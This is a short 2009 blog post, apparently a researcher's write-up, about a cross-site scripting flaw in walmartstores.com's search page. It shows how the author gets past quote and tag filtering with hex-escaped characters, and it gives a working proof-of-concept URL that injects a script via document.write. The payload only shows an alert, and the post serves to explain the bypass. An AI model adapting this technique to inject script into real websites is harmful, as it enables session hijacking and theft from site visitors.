This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 21, 2009

Making The Best Of Things - Walmartstores.com

Although the quote escaping is broken by the added backslash, the code below may seem secure at first glance. Note that the single quote character was left out of the test string: a search containing a single quote or <script> results in a 404 error.
s.pageName = "Search";
s.prop1 = "search";
s.prop7 = "testa.,:;\\"<>()[]{}";
s.prop11 = "0";
s.prop17 = "walmartstores.com";
Because of the extra backslashes needed to use quotes, calling eval or document.write with a new string literal is not possible, and with the search string converted to lowercase, String.fromCharCode cannot be called either. However, nothing stops us from setting s.prop7 to anything we want using hex character codes and then passing it to eval or document.write. Doing so would look something like this:

http://walmartstores.com/search/?q=\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x48\x65\x6C\x6C\x6F\x2C\x20\x57\x6F\x72\x6C\x64\x27\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\";document.write(s.prop7);//
